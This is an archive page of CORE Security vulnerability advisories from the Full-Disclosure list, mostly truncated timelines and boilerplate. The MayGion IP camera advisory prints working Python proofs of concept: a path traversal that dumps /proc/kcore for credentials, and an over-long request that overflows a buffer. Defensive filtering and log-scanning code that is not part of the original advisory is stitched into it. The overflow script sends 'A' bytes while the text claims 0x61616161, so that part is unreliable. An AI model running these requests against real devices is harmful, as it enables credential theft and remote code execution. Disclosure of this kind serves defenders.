[Full-disclosure] CORE-2013-0430 - Buffer overflow in Ubiquiti airCam RTSP service

2013-06-11 Thread CORE Security Technologies Advisories
: 0x41414141  0x41414141  0x41414141  0x12345678
0x40a7eaf0: 0x76696c2f  0x68632f65  0x305f3030  0x000d7100
0x40a7eb00: 0x000c6060  0x000c6119  0x00059340  0x000491a8
0x40a7eb10: 0x000d73f6  0x000c6267  0x0001  0x000c6060
0x40a7eb20: 0x000c6119  0x00059340  0x000c6118  0x00049780
0x40a7eb30: 0x  0x000c611c
-/


9. *Report Timeline*

. 2013-05-02:
Core Security Technologies notifies the Ubiquiti team of the
vulnerability. Publication date is set for May 29th, 2013.

. 2013-05-02:
Vendor acknowledges the receipt of the email and asks for technical
details.

. 2013-05-02:
A draft report with technical details and a PoC is sent to the Ubiquiti team.

. 2013-05-03:
Vendor notifies that a new firmware version should address this
vulnerability. It will be released shortly to the alpha and beta community.

. 2013-05-06:
Core notifies that the advisory will be re-scheduled to be released when
patches are available to the alpha and beta community and asks for a
tentative release date.

. 2013-05-09:
Core asks for a status update regarding this vulnerability and a
tentative release date.

. 2013-05-13:
Vendor notifies the firmware is still in internal testing and the
release date will be confirmed in the following days.

. 2013-05-27:
Core notifies that there was no answer in the last 2 weeks regarding the
release date. Core also notifies that the advisory was re-scheduled for
Jun 4th, and asks for a clear timeline to justify further delaying the
release.

. 2013-05-28:
Vendor notifies that the new firmware is almost done and a confirmed
date will be notified in the following days.

. 2013-05-29:
Core asks if a beta firmware is available for downloading.

. 2013-05-29:
Vendor notifies that they have a v1.1.6 build of the firmware which is
being tested internally and will be released very soon, probably this
week. However, it is not yet available on the ubnt.com/download site.

. 2013-05-29:
First release date missed.

. 2013-06-03:
Core asks for a status update.

. 2013-06-03:
Vendor notifies that they do not have a specific release date yet.

. 2013-06-11:
Vendor notifies that they released firmware 1.2.0 along with airVision 2
[2][3], and a public announcement will be made soon. The release of
firmware 1.1.6 (for the airVision 1.x platform) is still to be defined.

. 2013-06-11:
Advisory CORE-2013-0430 published.


10. *References*

[1] http://www.ubnt.com.
[2] Ubiquiti downloads http://www.ubnt.com/download#AirCam.
[3] Ubiquiti firmware v1.2.0
http://www.ubnt.com/downloads/AirCam-v1.2.0.build17961.bin.


11. *About CoreLabs*

CoreLabs, the research center of Core Security Technologies, is charged
with anticipating the future needs and requirements for information
security technologies. We conduct our research in several important
areas of computer security including system vulnerabilities, cyber
attack planning and simulation, source code auditing, and cryptography.
Our results include problem formalization, identification of
vulnerabilities, novel solutions and prototypes for new technologies.
CoreLabs regularly publishes security advisories, technical papers,
project information and shared software tools for public use at:
http://corelabs.coresecurity.com.


12. *About Core Security Technologies*

Core Security Technologies enables organizations to get ahead of threats
with security test and measurement solutions that continuously identify
and demonstrate real-world exposures to their most critical assets. Our
customers can gain real visibility into their security standing, real
validation of their security controls, and real metrics to more
effectively secure their organizations.

Core Security's software solutions build on over a decade of trusted
research and leading-edge threat expertise from the company's Security
Consulting Services, CoreLabs and Engineering groups. Core Security
Technologies can be reached at +1 (617) 399-6980 or on the Web at:
http://www.coresecurity.com.


13. *Disclaimer*

The contents of this advisory are copyright (c) 2013 Core Security
Technologies and (c) 2013 CoreLabs, and are licensed under a Creative
Commons Attribution Non-Commercial Share-Alike 3.0 (United States)
License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/


14. *PGP/GPG Keys*

This advisory has been signed with the GPG key of Core Security
Technologies advisories team, which is available for download at
http://www.coresecurity.com/files/attachments/core_security_advisories.asc.




signature.asc
Description: OpenPGP digital signature
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] CORE-2013-0517 - Xpient Cash Drawer Operation Vulnerability

2013-06-05 Thread CORE Security Technologies Advisories
 to active users
of Xpient software. Vendor asks that the Proof of Concept (PoC) and
technical details be removed from Core's report.

. 2013-06-04:
Core notifies that the advisory is re-scheduled for Jun 5th and will
include the PoC since it gives the users a tool to assess the risks they
are running and the effectiveness of possible countermeasures and
workarounds.

. 2013-06-05:
Advisory CORE-2013-0517 is published.


10. *References*

[1] http://www.xpient.com


11. *About CoreLabs*

CoreLabs, the research center of Core Security Technologies, is charged
with anticipating the future needs and requirements for information
security technologies. We conduct our research in several important
areas of computer security including system vulnerabilities, cyber
attack planning and simulation, source code auditing, and cryptography.
Our results include problem formalization, identification of
vulnerabilities, novel solutions and prototypes for new technologies.
CoreLabs regularly publishes security advisories, technical papers,
project information and shared software tools for public use at:
http://corelabs.coresecurity.com.


12. *About Core Security Technologies*

Core Security Technologies enables organizations to get ahead of threats
with security test and measurement solutions that continuously identify
and demonstrate real-world exposures to their most critical assets. Our
customers can gain real visibility into their security standing, real
validation of their security controls, and real metrics to more
effectively secure their organizations.

Core Security's software solutions build on over a decade of trusted
research and leading-edge threat expertise from the company's Security
Consulting Services, CoreLabs and Engineering groups. Core Security
Technologies can be reached at +1 (617) 399-6980 or on the Web at:
http://www.coresecurity.com.


13. *Disclaimer*

The contents of this advisory are copyright (c) 2013 Core Security
Technologies and (c) 2013 CoreLabs, and are licensed under a Creative
Commons Attribution Non-Commercial Share-Alike 3.0 (United States)
License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/


14. *PGP/GPG Keys*

This advisory has been signed with the GPG key of Core Security
Technologies advisories team, which is available for download at
http://www.coresecurity.com/files/attachments/core_security_advisories.asc.






[Full-disclosure] [CORE-2013-0103] Mac OSX Server DirectoryService buffer overflow

2013-06-04 Thread CORE Security Technologies Advisories
.

. 2013-06-04:
Advisory CORE-2013-0103 released.


9. *References*

[1] http://opensource.apple.com/source/DirectoryService/DirectoryService-621/Proxy/DSTCPEndpoint.cpp
[2] https://www.dlitz.net/software/pycrypto/
[3] http://support.apple.com/kb/HT5501 - DirectoryService
[4] https://appleseed.apple.com


10. *About CoreLabs*

CoreLabs, the research center of Core Security Technologies, is charged
with anticipating the future needs and requirements for information
security technologies. We conduct our research in several important
areas of computer security including system vulnerabilities, cyber
attack planning and simulation, source code auditing, and cryptography.
Our results include problem formalization, identification of
vulnerabilities, novel solutions and prototypes for new technologies.
CoreLabs regularly publishes security advisories, technical papers,
project information and shared software tools for public use at:
http://corelabs.coresecurity.com.


11. *About Core Security Technologies*

Core Security Technologies enables organizations to get ahead of threats
with security test and measurement solutions that continuously identify
and demonstrate real-world exposures to their most critical assets. Our
customers can gain real visibility into their security standing, real
validation of their security controls, and real metrics to more
effectively secure their organizations.

Core Security's software solutions build on over a decade of trusted
research and leading-edge threat expertise from the company's Security
Consulting Services, CoreLabs and Engineering groups. Core Security
Technologies can be reached at +1 (617) 399-6980 or on the Web at:
http://www.coresecurity.com.


12. *Disclaimer*

The contents of this advisory are copyright (c) 2012 Core Security
Technologies and (c) 2012 CoreLabs, and are licensed under a Creative
Commons Attribution Non-Commercial Share-Alike 3.0 (United States)
License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/


13. *PGP/GPG Keys*

This advisory has been signed with the GPG key of Core Security
Technologies advisories team, which is available for download at
http://www.coresecurity.com/files/attachments/core_security_advisories.asc.





[Full-disclosure] CORE-2013-0302 - Zavio IP Cameras multiple vulnerabilities

2013-05-28 Thread CORE Security Technologies Advisories
=date
General.Time.DayLightSaving.Start.Month=01
General.Time.DayLightSaving.Stop.Month=01
General.Time.DayLightSaving.Start.Week=1
General.Time.DayLightSaving.Stop.Week=1
General.Time.DayLightSaving.Start.Day=01
General.Time.DayLightSaving.Stop.Day=01
General.Time.DayLightSaving.Start.Date=01
General.Time.DayLightSaving.Stop.Date=01
General.Time.DayLightSaving.Start.Hour=00
General.Time.DayLightSaving.Stop.Hour=00
General.Time.DayLightSaving.Start.Min=00
General.Time.DayLightSaving.Stop.Min=00
Image.OSD.Enabled=off
-/

9. *Report Timeline*

. 2013-03-19:
Core Security Technologies contacts Zavio Tech Support and requests a
security manager contact to whom a draft report regarding these
vulnerabilities can be sent. No reply received.

. 2013-05-02:
Core asks Zavio Tech Support for a security manager to send a
confidential report.

. 2013-05-09:
Core asks for a reply.

. 2013-05-14:
Core asks for a reply.

. 2013-05-21:
Core tries to contact the vendor for the last time, without any reply.

. 2013-05-28:
After 5 failed attempts to report the issues, the advisory
CORE-2013-0302 is published as 'user-release'.

10. *References*

[1] http://www.zavio.com/product.php?id=25.
[2] http://zavio.com/product.php?id=23.
[3] http://www.boa.org/.

11. *About CoreLabs*

CoreLabs, the research center of Core Security Technologies, is charged
with anticipating the future needs and requirements for information
security technologies. We conduct our research in several important
areas of computer security including system vulnerabilities, cyber
attack planning and simulation, source code auditing, and cryptography.
Our results include problem formalization, identification of
vulnerabilities, novel solutions and prototypes for new technologies.
CoreLabs regularly publishes security advisories, technical papers,
project information and shared software tools for public use at:
http://corelabs.coresecurity.com.

12. *About Core Security Technologies*

Core Security Technologies enables organizations to get ahead of threats
with security test and measurement solutions that continuously identify
and demonstrate real-world exposures to their most critical assets. Our
customers can gain real visibility into their security standing, real
validation of their security controls, and real metrics to more
effectively secure their organizations.

Core Security's software solutions build on over a decade of trusted
research and leading-edge threat expertise from the company's Security
Consulting Services, CoreLabs and Engineering groups. Core Security
Technologies can be reached at +1 (617) 399-6980 or on the Web at:
http://www.coresecurity.com.

13. *Disclaimer*

The contents of this advisory are copyright (c) 2013 Core Security
Technologies and (c) 2013 CoreLabs, and are licensed under a Creative
Commons Attribution Non-Commercial Share-Alike 3.0 (United States)
License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/

14. *PGP/GPG Keys*

This advisory has been signed with the GPG key of Core Security
Technologies advisories team, which is available for download at
http://www.coresecurity.com/files/attachments/core_security_advisories.asc.





[Full-disclosure] CORE-2013-0322 - MayGion IP Cameras multiple vulnerabilities

2013-05-28 Thread CORE Security Technologies Advisories
Core Security - Corelabs Advisory
http://corelabs.coresecurity.com/

MayGion IP Cameras multiple vulnerabilities

1. *Advisory Information*

Title: MayGion IP Cameras multiple vulnerabilities
Advisory ID: CORE-2013-0322
Advisory URL:
http://www.coresecurity.com/advisories/maygion-IP-cameras-multiple-vulnerabilities
Date published: 2013-05-28
Date of last update: 2013-05-28
Vendors contacted: MayGion
Release mode: Coordinated release

2. *Vulnerability Information*

Class: Path traversal [CWE-22], Buffer overflow [CWE-119]
Impact: Code execution, Security bypass
Remotely Exploitable: Yes
Locally Exploitable: No
CVE Name: CVE-2013-1604, CVE-2013-1605

3. *Vulnerability Description*

Multiple vulnerabilities have been found in MayGion IP cameras [1] based
on firmware v09.27 and below, which could allow an unauthenticated remote
attacker:

   1. [CVE-2013-1604] to dump the camera's memory and retrieve user
credentials,
   2. [CVE-2013-1605] to execute arbitrary code.

4. *Vulnerable Packages*

   . MayGion IP cameras based on firmware 2011.27.09.
   . Other firmware versions are probably affected too but they were not
checked.

5. *Non-Vulnerable Packages*

   . H.264 ipcam firmware 2013.04.22.

6. *Credits*

These vulnerabilities were discovered and researched by Nahuel Riva and
Francisco Falcon from Core Exploit Writers Team.

7. *Technical Description / Proof of Concept Code*

7.1. *User Credentials Leaked via Path Traversal*

[CVE-2013-1604] The following Python code exploits a path traversal and
dumps the camera's memory. Valid user credentials can be extracted from
this memory dump by an unauthenticated remote attacker.

/-
import httplib

# Camera address used throughout the advisory
conn = httplib.HTTPConnection("192.168.100.1")
# The embedded web server does not normalise "..", so the request escapes
# the document root and serves the kernel memory image /proc/kcore
conn.request("GET", "/../../../../../../../../../proc/kcore")
resp = conn.getresponse()
data = resp.read()  # memory dump; credentials can be searched for in it
conn.close()
-/

7.2. *Buffer overflow*

[CVE-2013-1605] The following Python script can be used to trigger the
vulnerability without authentication. As a result, the Instruction
Pointer register (IP) will be overwritten with 0x61616161, which is a
typical buffer overrun condition.

/-
import httplib

# Camera address used throughout the advisory
conn = httplib.HTTPConnection("192.168.100.1")
# A 3000-byte request path overruns a fixed-size buffer in the web server;
# the bytes 0x61 ('a') that land on the saved return address give 0x61616161
conn.request("GET", "/" + "A" * 3000 + ".html")
resp = conn.getresponse()
data = resp.read()
conn.close()
-/
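Both PoCs above exercise the camera's HTTP request handling: section 7.1 sends a target containing `..` segments, section 7.2 an over-long target. The following Python 3 code is an added example, not part of the Core advisory or of the MayGion firmware, showing the two server-side checks that neutralise those request shapes and a small access-log scan that flags them. The document root `/var/www`, the `MAX_TARGET_LEN` bound and the log lines are constructed assumptions.

```python
import posixpath
from urllib.parse import unquote

DOC_ROOT = "/var/www"    # assumed document root of the camera's web server
MAX_TARGET_LEN = 1024    # assumed bound; the overflow PoC uses a ~3000-byte path


def classify_target(target):
    """Classify a raw HTTP request target.

    Returns one of:
      "overlong"  - longer than MAX_TARGET_LEN (the section 7.2 pattern)
      "traversal" - contains a ".." segment after percent-decoding (section 7.1)
      "ok"        - neither
    Length is checked first, on the raw string, before any decoding or parsing.
    """
    if len(target) > MAX_TARGET_LEN:
        return "overlong"
    path = unquote(target.split("?", 1)[0])
    # Treat backslashes as separators too so "..\\" is not missed.
    segments = path.replace("\\", "/").split("/")
    if ".." in segments:
        return "traversal"
    return "ok"


def resolve_request_path(target, doc_root=DOC_ROOT):
    """Map a request target to a file under doc_root, or return None.

    Rejects targets that classify_target() flags, then normalises the path
    and confirms the result still lies inside doc_root (defence in depth in
    case a later decoding step were to introduce new ".." segments).
    """
    if classify_target(target) != "ok":
        return None
    path = unquote(target.split("?", 1)[0])
    if not path.startswith("/"):
        return None
    root = posixpath.normpath(doc_root)
    full = posixpath.normpath(posixpath.join(root, path.lstrip("/")))
    if full != root and not full.startswith(root + "/"):
        return None
    return full


def scan_access_log(lines):
    """Count request targets by class in common-log-format lines."""
    counts = {"overlong": 0, "traversal": 0, "ok": 0}
    for line in lines:
        # The request target is the second token of the quoted request line,
        # e.g. "GET /index.html HTTP/1.1"
        try:
            request = line.split('"')[1]
            target = request.split()[1]
        except IndexError:
            continue
        counts[classify_target(target)] += 1
    return counts


# Constructed sample log lines (not from the advisory); the first two mirror
# the request shapes of sections 7.1 and 7.2, the third is a percent-encoded
# variant of 7.1, the fourth is a benign request.
SAMPLE_LOG = [
    '192.168.100.50 - - [28/May/2013:10:00:01 +0000] '
    '"GET /../../../../../../../../../proc/kcore HTTP/1.1" 200 4096',
    '192.168.100.50 - - [28/May/2013:10:00:02 +0000] '
    '"GET /' + "A" * 3000 + '.html HTTP/1.1" 500 0',
    '192.168.100.51 - - [28/May/2013:10:00:03 +0000] '
    '"GET /%2e%2e/%2e%2e/etc/passwd HTTP/1.1" 404 0',
    '192.168.100.52 - - [28/May/2013:10:00:04 +0000] '
    '"GET /index.html HTTP/1.1" 200 1234',
]

if __name__ == "__main__":
    print(scan_access_log(SAMPLE_LOG))
    print(resolve_request_path("/index.html"))
    print(resolve_request_path("/../../../../../../../../../proc/kcore"))
```

The length bound is applied before percent-decoding on purpose: a parser that decodes first can be made to allocate or copy the full over-long buffer before it ever gets to the check, which is exactly the order of operations a fixed-size buffer cannot survive.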

8. *Report Timeline*

. 2013-05-02:
Core Security Technologies notifies MayGion of the vulnerabilities.
Publication date is set for May 29th, 2013.

. 2013-05-02:
Vendor asks for a report with technical information.

. 2013-05-03:
A draft advisory containing technical details is sent to the MayGion team.

. 2013-05-03:
Vendor notifies that all vulnerabilities were fixed in the last firmware
version, released April 22nd, 2013.

. 2013-05-09:
Core asks for a list of affected devices and firmware. No reply received.

. 2013-05-28:
Advisory CORE-2013-0322 is published.

9. *References*

[1] http://www.maygion.com

10. *About CoreLabs*

CoreLabs, the research center of Core Security Technologies, is charged
with anticipating the future needs and requirements for information
security technologies. We conduct our research in several important
areas of computer security including system vulnerabilities, cyber
attack planning and simulation, source code auditing, and cryptography.
Our results include problem formalization, identification of
vulnerabilities, novel solutions and prototypes for new technologies.
CoreLabs regularly publishes security advisories, technical papers,
project information and shared software tools for public use at:
http://corelabs.coresecurity.com.

11. *About Core Security Technologies*

Core Security Technologies enables organizations to get ahead of threats
with security test and measurement solutions that continuously identify
and demonstrate real-world exposures to their most critical assets. Our
customers can gain real visibility into their security standing, real
validation of their security controls, and real metrics to more
effectively secure their organizations.

Core Security's software solutions build on over a decade of trusted
research and leading-edge threat expertise from the company's Security
Consulting Services, CoreLabs and Engineering groups. Core Security
Technologies can be reached at +1 (617) 399-6980 or on the Web at:
http://www.coresecurity.com.

12. *Disclaimer*

The contents of this advisory are copyright (c) 2013 Core Security
Technologies and (c) 2013 CoreLabs, and are licensed under a Creative
Commons Attribution Non-Commercial Share-Alike 3.0 (United States)
License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/

13. *PGP/GPG Keys*

This advisory has been signed with the GPG key of Core Security
Technologies advisories team, which is available for download at
http://www.coresecurity.com/files/attachments/core_security_advisories.asc.





[Full-disclosure] CORE-2013-0318 - TP-Link IP Cameras Multiple Vulnerabilities

2013-05-28 Thread CORE Security Technologies Advisories
10. *About CoreLabs*

CoreLabs, the research center of Core Security Technologies, is charged
with anticipating the future needs and requirements for information
security technologies. We conduct our research in several important
areas of computer security including system vulnerabilities, cyber
attack planning and simulation, source code auditing, and cryptography.
Our results include problem formalization, identification of
vulnerabilities, novel solutions and prototypes for new technologies.
CoreLabs regularly publishes security advisories, technical papers,
project information and shared software tools for public use at:
http://corelabs.coresecurity.com.

11. *About Core Security Technologies*

Core Security Technologies enables organizations to get ahead of threats
with security test and measurement solutions that continuously identify
and demonstrate real-world exposures to their most critical assets. Our
customers can gain real visibility into their security standing, real
validation of their security controls, and real metrics to more
effectively secure their organizations.

Core Security's software solutions build on over a decade of trusted
research and leading-edge threat expertise from the company's Security
Consulting Services, CoreLabs and Engineering groups. Core Security
Technologies can be reached at +1 (617) 399-6980 or on the Web at:
http://www.coresecurity.com.

12. *Disclaimer*

The contents of this advisory are copyright (c) 2013 Core Security
Technologies and (c) 2013 CoreLabs, and are licensed under a Creative
Commons Attribution Non-Commercial Share-Alike 3.0 (United States)
License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/

13. *PGP/GPG Keys*

This advisory has been signed with the GPG key of Core Security
Technologies advisories team, which is available for download at
http://www.coresecurity.com/files/attachments/core_security_advisories.asc.





[Full-disclosure] CORE-2013-0301 - Vivotek IP Cameras Multiple Vulnerabilities

2013-04-29 Thread CORE Security Technologies Advisories
12. *About Core Security Technologies*

Core Security Technologies enables organizations to get ahead of threats
with security test and measurement solutions that continuously identify
and demonstrate real-world exposures to their most critical assets. Our
customers can gain real visibility into their security standing, real
validation of their security controls, and real metrics to more
effectively secure their organizations.

Core Security's software solutions build on over a decade of trusted
research and leading-edge threat expertise from the company's Security
Consulting Services, CoreLabs and Engineering groups. Core Security
Technologies can be reached at +1 (617) 399-6980 or on the Web at:
http://www.coresecurity.com.

13. *Disclaimer*

The contents of this advisory are copyright (c) 2012 Core Security
Technologies and (c) 2012 CoreLabs, and are licensed under a Creative
Commons Attribution Non-Commercial Share-Alike 3.0 (United States)
License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/

14. *PGP/GPG Keys*

This advisory has been signed with the GPG key of Core Security
Technologies advisories team, which is available for download at
http://www.coresecurity.com/files/attachments/core_security_advisories.asc.




[Full-disclosure] CORE-2013-0303 - D-Link IP Cameras Multiple Vulnerabilities

2013-04-29 Thread CORE Security Technologies Advisories
Commons Attribution Non-Commercial Share-Alike 3.0 (United States)
License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/

13. *PGP/GPG Keys*

This advisory has been signed with the GPG key of Core Security
Technologies advisories team, which is available for download at
http://www.coresecurity.com/files/attachments/core_security_advisories.asc.





[Full-disclosure] CORE-2012-1128 - SAP Netweaver Message Server Multiple Vulnerabilities

2013-02-15 Thread CORE Security Technologies Advisories
/bdc344cc104231e1000a421937/content.htm.

[4] http://help.sap.com/saphelp_nw70ehp2/helpdata/en/47/c2e782b8fd3020e1000a42189d/frameset.htm.

[5] SAP Security notes Feb 2012
https://service.sap.com/sap/support/notes/1649840.
[6] http://www.zerodayinitiative.com/advisories/ZDI-12-104/.
[7] http://www.zerodayinitiative.com/advisories/ZDI-12-111/.
[8] http://www.zerodayinitiative.com/advisories/ZDI-12-112/.


11. *About CoreLabs*

CoreLabs, the research center of Core Security Technologies, is charged
with anticipating the future needs and requirements for information
security technologies. We conduct our research in several important
areas of computer security including system vulnerabilities, cyber
attack planning and simulation, source code auditing, and cryptography.
Our results include problem formalization, identification of
vulnerabilities, novel solutions and prototypes for new technologies.
CoreLabs regularly publishes security advisories, technical papers,
project information and shared software tools for public use at:
http://corelabs.coresecurity.com.


12. *About Core Security Technologies*

Core Security Technologies enables organizations to get ahead of threats
with security test and measurement solutions that continuously identify
and demonstrate real-world exposures to their most critical assets. Our
customers can gain real visibility into their security standing, real
validation of their security controls, and real metrics to more
effectively secure their organizations.

Core Security's software solutions build on over a decade of trusted
research and leading-edge threat expertise from the company's Security
Consulting Services, CoreLabs and Engineering groups. Core Security
Technologies can be reached at +1 (617) 399-6980 or on the Web at:
http://www.coresecurity.com.


13. *Disclaimer*

The contents of this advisory are copyright (c) 2012 Core Security
Technologies and (c) 2012 CoreLabs, and are licensed under a Creative
Commons Attribution Non-Commercial Share-Alike 3.0 (United States)
License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/


14. *PGP/GPG Keys*

This advisory has been signed with the GPG key of Core Security
Technologies advisories team, which is available for download at
http://www.coresecurity.com/files/attachments/core_security_advisories.asc.







[Full-disclosure] CORE-2011-1123 - Windows Kernel ReadLayoutFile Heap Overflow

2012-07-17 Thread CORE Security Technologies Advisories
 still stands.

. 2012-03-12:
MSRC notifies that, due to some late findings about app-compat concerns,
they will need more time to issue the patch. MSRC asks to re-schedule
the advisory publication to May 8th.

. 2012-03-09:
Core re-schedules the advisory publication to May 8th.

. 2012-04-01:
Pedro Varangot leaves the Core Advisories Team. Thanks Peter and good
luck with your new challenges.

. 2012-04-02:
Core asks for additional information regarding which Windows versions
are actually vulnerable and for specific workarounds for this vulnerability.

. 2012-04-03:
MSRC notifies that the actual vulnerable systems are Windows XP/2003 as
Elevation of Privileges and Windows Vista/2008 as Denial of Service.
MSRC also notifies that no workaround has been identified for this
vulnerability.

. 2012-05-08:
The advisory CORE-2011-1123 is published.

. 2012-05-08:
MSRC publishes the Security Bulletin MS12-034 [3] for addressing this
issue.

. 2012-05-11:
Core notifies MSRC that the vulnerability was not correctly patched in
[3] and re-sends a PoC to reproduce the issue.

. 2012-05-14:
Based on the blog post [5], MSRC asks for a PoC which triggers the issue
in a Vista/Windows 7 platform.

. 2012-05-14:
Core clarifies that this issue seems not to be exploitable on Windows 7
(as noted in the blog post [5]), but it is still exploitable on Windows
Vista and 2008. Core also notifies that the exploit for this
vulnerability was sent to Core Impact clients on May 8th, 2012.

. 2012-05-16:
MSRC notifies that a new patch will be released and a new CVE number
will be assigned to it.

. 2012-05-17:
Core acknowledges the update and asks for a publication date for it.

. 2012-05-18:
MSRC asks for a conference call to discuss this issue and asks Core to
make no changes to the advisory or the blog post until the publication day.

. 2012-05-18:
Core requests that all communication be kept to email in order to track
all interactions and involve everyone interested in the issue. Core also
notifies that the advisory update will be released after the new patch
is published.

. 2012-06-14:
Core asks MSRC for additional information regarding this issue.

. 2012-06-18:
MSRC notifies that they are targeting July as publication timeframe for
this issue.

. 2012-06-21:
Core acknowledges the publication date and asks for the new CVE number
and any additional information that can be added in the advisory amendment.

. 2012-07-05:
MSRC informs Core that the new bulletin will be published on July 10th,
and that the new CVE number is CVE-2012-1890.

. 2012-07-10:
MSRC publishes the Security Bulletin Summary for July 2012 [6].

. 2012-07-11:
The advisory CORE-2011-1123 is updated.



9. *References*

[1] http://www.exploit-db.com/exploits/18140/
[2] http://msdn.microsoft.com/en-us/library/windows/desktop/ms646305(v=vs.85).aspx
[3] http://technet.microsoft.com/en-gb/security/bulletin/ms12-034
[4] http://technet.microsoft.com/en-gb/security/bulletin/ms12-047
[5] http://blog.coresecurity.com/2012/05/10/the-big-trick-behind-exploit-ms12-034/
[6] http://technet.microsoft.com/en-us/security/bulletin/ms12-jul


10. *About CoreLabs*

CoreLabs, the research center of Core Security Technologies, is charged
with anticipating the future needs and requirements for information
security technologies. We conduct our research in several important
areas of computer security including system vulnerabilities, cyber
attack planning and simulation, source code auditing, and cryptography.
Our results include problem formalization, identification of
vulnerabilities, novel solutions and prototypes for new technologies.
CoreLabs regularly publishes security advisories, technical papers,
project information and shared software tools for public use at:
http://corelabs.coresecurity.com.


11. *About Core Security Technologies*

Core Security Technologies enables organizations to get ahead of threats
with security test and measurement solutions that continuously identify
and demonstrate real-world exposures to their most critical assets. Our
customers can gain real visibility into their security standing, real
validation of their security controls, and real metrics to more
effectively secure their organizations.

Core Security's software solutions build on over a decade of trusted
research and leading-edge threat expertise from the company's Security
Consulting Services, CoreLabs and Engineering groups. Core Security
Technologies can be reached at +1 (617) 399-6980 or on the Web at:
http://www.coresecurity.com.


12. *Disclaimer*

The contents of this advisory are copyright (c) 2012 Core Security
Technologies and (c) 2012 CoreLabs, and are licensed under a Creative
Commons Attribution Non-Commercial Share-Alike 3.0 (United States)
License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/


13. *PGP/GPG Keys*

This advisory has been signed with the GPG key of Core Security
Technologies advisories team, which is available for download at
http://www.coresecurity.com/files

[Full-disclosure] CORE-2012-0530 - Lattice Diamond Programmer Buffer Overflow

2012-06-21 Thread CORE Security Technologies Advisories
;
TDILOW;
TDOLOW;
TRSTABSENT;
CableENHIGH;
/PinSetting
/ProjectOptions
/ispXCF
-/


9. *Report Timeline*

. 2012-05-30:
Core Security Technologies notifies Lattice Semiconductor Corporation of
the vulnerability. Publication date is set for June 26th, 2012.

. 2012-06-06:
Core notifies Lattice Semiconductor Corporation of the vulnerability.

. 2012-06-11:
Core notifies that the previous emails were not answered and requests a
reply.

. 2012-06-11:
Vendor asks Core to remove their email addresses from Core's mailing lists.

. 2012-06-11:
Core requests an email address or any other security contact information
at Lattice in order to begin discussions regarding the vulnerability. No
reply was received.

. 2012-06-21:
Advisory CORE-2012-0530 published.


10. *References*

[1] http://www.latticesemi.com/products/designsoftware/diamond/index.cfm.
[2] Lattice technical support, mailto:techsupp...@latticesemi.com.


13. *Disclaimer*

The contents of this advisory are copyright (c) 2011 Core Security
Technologies and (c) 2011 CoreLabs, and are licensed under a Creative
Commons Attribution Non-Commercial Share-Alike 3.0 (United States)
License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/


14. *PGP/GPG Keys*

This advisory has been signed with the GPG key of Core Security
Technologies advisories team, which is available for download at
http://www.coresecurity.com/files/attachments/core_security_advisories.asc.




___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] CORE-2012-0123 - SAP Netweaver Dispatcher Multiple Vulnerabilities

2012-05-08 Thread CORE Security Technologies Advisories
 this date cannot be guaranteed.

. 2012-05-04:
Core notifies that everything is ready for publication and requests the
vendor to confirm the release date and the list of affected platforms
(no reply received).

. 2012-05-07:
Core asks again for the status of the fix.

. 2012-05-08:
SAP notifies that they have released the security note 1687910 [4] on
May Patch Day 2012 and asks to include that information in [Sec. 6]. SAP
also requests Core to remove all the technical information researched by
Martin Gallo in [Sec. 8].

. 2012-05-08:
Core replies that the reporting of vulnerabilities is aimed at helping
vulnerable users to understand and address the issues; the advisory will
thus be released with the technical information.

. 2012-05-08:
Advisory CORE-2012-0123 published.



10. *References*

[1] http://www.sap.com/platform/netweaver/index.epx
[2] http://help.sap.com/saphelp_nw70ehp2/helpdata/en/47/cc212b3fa5296fe1000a42189b/frameset.htm
[3] SAP's legal information, terms and conditions
http://www.sdn.sap.com/irj/sdn/security?rid=/webcontent/uuid/c05604f6-4eb3-2d10-eea7-ceb666083a6a#section46
[4] SAP security note 1687910
https://service.sap.com/sap/support/notes/1687910


13. *Disclaimer*

The contents of this advisory are copyright (c) 2012 Core Security
Technologies and (c) 2012 CoreLabs, and are licensed under a Creative
Commons Attribution Non-Commercial Share-Alike 3.0 (United States)
License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/


14. *PGP/GPG Keys*

This advisory has been signed with the GPG key of Core Security
Technologies advisories team, which is available for download at
http://www.coresecurity.com/files/attachments/core_security_advisories.asc.





[Full-disclosure] CORE-2011-0919: Apple OS X Sandbox Predefined Profiles Bypass

2011-11-10 Thread CORE Security Technologies Advisories
 in the PoC just to keep it simple) an attacker could circumvent
the restriction. So, at the end, sockets-based networking is used.

. 2010-10-18:
Vendor responds that it is currently considering modifying its
documentation to explicitly point out what Core described; namely,
that the restrictions that these particular sandbox profiles provide
are limited to the process in which the sandbox is applied.

. 2011-11-10:
The advisory CORE-2011-0919 is published as user release.


10. *References*

[1] App Sandbox Design Guide -- Designing for App Sandbox
http://developer.apple.com/library/mac/#documentation/Security/Conceptual/AppSandboxDesignGuide/DesigningYourSandbox/DesigningYourSandbox.html

[2] Charlie Miller, Hacking OS X, Black Hat Japan 2008
https://www.blackhat.com/presentations/bh-jp-08/bh-jp-08-Miller/BlackHat-Japan-08-Miller-Hacking-OSX.pdf


13. *Disclaimer*

The contents of this advisory are copyright (c) 2011 Core Security
Technologies and (c) 2011 CoreLabs, and are licensed under a Creative
Commons Attribution Non-Commercial Share-Alike 3.0 (United States)
License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/


14. *PGP/GPG Keys*

This advisory has been signed with the GPG key of Core Security
Technologies advisories team, which is available for download at
http://www.coresecurity.com/files/attachments/core_security_advisories.asc.



[Full-disclosure] CORE-2011-0825: Adobe Shockwave Player TextXtra.x32 vulnerability

2011-11-08 Thread CORE Security Technologies Advisories
:
The advisory CORE-2011-0825 is published.


10. *References*

[1] Security bulletin for Adobe Shockwave Player
http://www.adobe.com/support/security/bulletins/apsb11-27.html
